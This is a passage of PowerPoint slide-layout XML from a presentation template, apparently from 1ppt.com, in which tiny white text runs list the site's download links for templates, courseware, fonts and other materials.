              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout164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64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64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64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6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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout165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65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65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65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65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65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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout165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65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65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65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6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66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66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66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66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66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66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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
